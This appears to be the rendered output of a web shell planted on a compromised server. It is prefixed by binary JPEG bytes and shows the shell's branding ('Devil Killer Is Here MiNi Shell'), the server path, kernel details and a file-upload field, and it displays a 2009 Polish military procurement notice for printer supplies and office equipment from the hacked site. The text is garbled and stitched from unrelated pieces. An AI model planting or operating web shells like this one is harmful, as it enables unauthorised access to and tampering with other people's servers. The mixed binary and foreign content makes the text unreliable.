JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090929/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090929/336392-N-2009.html

<p class="kh_header"><b>Bydgoszcz: Dostawa materiałów eksploatacyjnych i sprzętu.</b><br>
<b>Numer ogłoszenia: 336392 - 2009; data zamieszczenia: 29.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa nr 1515 , ul. Gdańska 147, 85-915 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 3783282, faks 052 3782417.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jw1515.pow.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: wojskowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów eksploatacyjnych i sprzętu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> DOSTAWA MATERIAŁÓW EKSPLOATACYJNYCH DO DRUKAREK, WKŁADÓW BARWIĄCYCH DO FOTOKOPIAREK, NISZCZAREK DO DOKUMENTÓW, CZĘŚCI I AKCESORIÓW DO FOTOKOPIAREK ORAZ URZĄDZEŃ BIUROWYCH WYMIENIONYCH W ZAŁĄCZNIKACH NR 1 - 4 DO SPECYFIKACJI ISTOTNYCH WARUNKÓW ZAMÓWIENIA. 

1. Materiały użyte do wykonania przedmiotu zamówienia winny być fabrycznie nowe, pochodzić z bieżącej produkcji oraz winny spełniać następujące wymagania:
a) winny być o parametrach nie gorszych od określonych przez zamawiającego;
b) nie mogą być wynikiem prefabrykacji oraz ponownego napełniania;
c) nie mogą zawierać elementów zużytych lub wcześniej użytych;
d) nie mogą powodować utraty gwarancji sprzętu drukującego;
e) winny spełniać wymagania techniczne zalecane przez producenta sprzętu drukującego.

2. Materiały eksploatacyjne winny posiadać na opakowaniu oryginalne opisy, nie preparowane etykiety z pełnym opisem zawartości opakowania, nazwę producenta i przeznaczenie danego materiału. Opisy opakowań mogą być wykonane w języku angielskim, natomiast instrukcje obsługi winny być opracowane w języku polskim.

3.  Sprzęt i materiały eksploatacyjne winny być fabrycznie nowe i winny pochodzić z bieżącej produkcji.

4. Wykonawca udzieli min. 12 mies. gwarancji na materiały i sprzęt, stanowiące przedmiot zamówienia.  
5. Jeżeli w opisie przedmiotu zamówienia znajdują się wskazania znaków towarowych, patentów lub pochodzenia, Wykonawca może zaoferować przedmioty równoważne. Wykazanie, że oferowane dostawy spełniają wymagania określone przez Zamawiającego jest obowiązkiem Wykonawcy.
6. Zamawiający dopuszcza składanie ofert równoważnych.
7. Za ofertę równoważną Zamawiający uzna ofertę, w której Wykonawca oferuje materiały o  parametrach technicznych i jakościowych równorzędnych lub lepszych od wymaganych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.00.00.00-0, 30.10.00.00-0, 30.12.51.00-2, 30.19.21.13-6, 30.12.51.20-8, 30.12.50.00-1, 30.19.14.00-8, 30.00.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. W niniejszym postępowaniu o udzielenie zamówienia publicznego, wykonawcy     wnoszą wadium. 
2. Wadium wnosi się przed upływem terminu składania ofert - tj. do dnia 08.10.2009 r. godz. 09.00.
3. Wysokość wadium wynosi:
Zadanie nr 1 - 2000,00 zł.
Zadanie nr 2 - 400,00 zł.
Zadanie nr 3 - 400,00 zł.
Zadanie nr 4 - 250,00 zł
4. Wadium może być wnoszone w jednej lub kilku następujących formach: 
a) pieniądzu,
b) poręczeniach bankowych,
c) poręczenia spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
d) gwarancjach bankowych,
e) gwarancjach ubezpieczeniowych,
f) poręczeniach udzielanych przez podmioty, o których mowa w 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. nr 109, poz. 1158 z późn. zm.).
5. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy zamawiającego - Jednostka Wojskowa Nr 1515 w Bydgoszczy -  NBP O/O BYDGOSZCZ 52 1010 1078 0093 9313 9120 0000 z dopiskiem  - wadium na dostawę materiałów eksploatacyjnych. 
6. Wadium winno zabezpieczać ofertę przez okres związania ofertą.
7. Wadium wnoszone w innych formach (oryginał) należy złożyć do Głównego Księgowego zamawiającego.
8. Zwrot wadium nastąpi zgodnie z art.46 Prawa zamówień publicznych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 Ustawy, który stanowi, że wykluczeniu z postępowania o udzielenie zamówienia podlegają:

a) wykonawcy, którzy w ciągu ostatnich trzech lat przed wszczęciem postępowania wyrządzili szkodę nie wykonując zamówienia lub wykonując je nienależycie, a szkoda ta nie została dobrowolnie naprawiona do dnia wszczęcia postępowania;
b) wykonawcy, w stosunku do których otwarto likwidację lub których upadłość ogłoszono, z wyjątkiem wykonawców, którzy po ogłoszeniu upadłości zawarli układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje likwidacji majątku upadłego;
c) wykonawcy, którzy zalegają z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne, z wyjątkiem przypadków gdy uzyskali oni przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty zaległości płatności lub wstrzymanie w całości wykonanie decyzji właściwego organu;
d) wykonawcy ( osoby fizyczne, wspólnika w spółkach jawnych, partnera lub członka zarządu w spółkach partnerskich, komplementariusza w spółkach komandytowych oraz komandytowo - akcyjnych, urzędującego członka organu zarządzającego osób prawnych ) których prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie lub związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego; 
e) podmioty zbiorowe, wobec których sąd orzekł zakaz ubiegania się o zamówienia, na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary;
f) wykonawcy, którzy nie spełniają warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 1-3;
g) wykonawcy, którzy wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności;
h) wykonawcy, którzy złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania;
i) wykonawcy, którzy nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnienie tych warunków lub złożone dokumenty zawierają błędy;
j) nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na przedłużenie okresu związania ofertą.

2. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 Ustawy:
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy, nakładają obowiązek posiadania takich uprawnień; 
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem   technicznym i osobami zdolnymi do wykonania zamówienia; 
c) znajdują się w sytuacji ekonomicznej i finansowej, zapewniającej wykonanie  zamówienia; 

3. Zamawiający uzna, że Wykonawca: 
a) Posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, jeżeli w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, minimum trzy dostawy odpowiadające swoim rodzajem przedmiotowi zamówienia ( dostawa materiałów eksploatacyjnych, sprzętu i urządzeń biurowych ) o wartości nie mniejszej od ceny złożonej oferty. 
4. Ocena spełniania ww. warunków dokonana zostanie wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt. VII niniejszej SIWZ, które Wykonawca jest zobowiązany załączyć do oferty. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż ww. warunki Wykonawca spełnił. 
5. Nie spełnienie chociażby jednego z ww. warunków skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 1 lub 2 ustawy oraz odrzuceniem oferty na podstawie art. 89 ust. 1 pkt 5 ustawy. 
6. Ocena Wykonawcy pod względem formalnym dokonana będzie po otwarciu ofert, a przed ich oceną merytoryczną. 
7. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W przypadku konsorcjum wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wykonawca, którego ofertę wybrano, przed zawarciem umowy dostarczy umowę między podmiotami występującymi wspólnie.   
8. Wykonawcy przedłożą wraz z ofertą pełnomocnictwo wszystkich stron, cel działania, sposób ich współdziałania, zakres prac przewidzianych do wykonania przez każdego z nich, sposób odpowiedzialności (wymaga się solidarnej odpowiedzialności wykonawców); 
   9. W odniesieniu do wymagań postawionych przez Zamawiającego, każdy z przedsiębiorców wchodzący w skład konsorcjum oddzielnie musi udokumentować, że nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 pkt 1-8 i 10 ( podmioty zbiorowe dodatkowo pkt 9 ) oraz art. 24 ust. 2 Ustawy.   
10. Zamawiający dopuszcza, aby warunki określone w art. 22 ust. 1 pkt 2 i 3 Ustawy i pkt. VI    2 b i c S.I.W.Z., spełniał jeden lub wszyscy łącznie Wykonawcy wspólnie ubiegający się o zamówienie publiczne, załączając do oferty wymagane dokumenty i oświadczenia  świadczące o łącznym spełnieniu wymogów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oświadczenia i dokumenty, jakie winien złożyć Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu o udzielenie zamówienia publicznego: 

a) Oświadczenie, że wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 Prawa zamówień publicznych oraz spełnia warunki określone w art. 22 ust. 1 Ustawy - zał. nr 7;

b) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 

c)  Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych dostaw w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem przedmiotowi zamówienia ( dostawa mat. eksploatacyjnych sprzętu i urządzeń biurowych ) i wartością nie mniejszą od ceny złożonej oferty, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenie dokumentów 
( referencje, opinie, protokoły odbioru ) potwierdzających, że te dostawy wykonane zostały należycie - potwierdzenie spełnienia warunku określonego w pkt VI 2 b s.i.w.z.; - wg wzoru zał. nr 9.

Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą złożyć dokumenty wymienione w pkt VII 1 c, s.i.w.z. świadczące o spełnieniu warunków przez jednego przedsiębiorcę lub wszystkich łącznie .
  
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium       Rzeczypospolitej Polskiej, stosuje się do przepisów § 2 Rozporządzenia Prezesa Rady Ministrów z 19.05.2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający  od wykonawcy, oraz form, w jakich te dokumenty mogą być składane..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.jw1515.pow.mil.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa Nr 1515 ul. Gdańska 147, 85-915 Bydgoszcz - budynek nr 25 pok. 101..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.10.2009 godzina 09:00, miejsce: Jednostka Wojskowa Nr 1515 ul. Gdańska 147, 85-915 Bydgoszcz - kancelaria tajna..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa materiałów eksploatacyjnych do drukarek. Opis przedmiotu zamówienia w załączniku nr 1 do s.i.w.z..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wkładów barwiących do fotokopiarek. Opis przedmiotu zamówienia w załączniku nr 2 do s.i.w.z..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.20-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa niszczarek i części zamiennych do fotokopiarek. Opis przedmiotu zamówienia w załączniku nr 3 do s.i.w.z..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.50.00-1, 30.19.14.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa urządzeń biurowych. Opis przedmiotu zamówienia w załączniku nr 4 do s.i.w.z..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.00.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com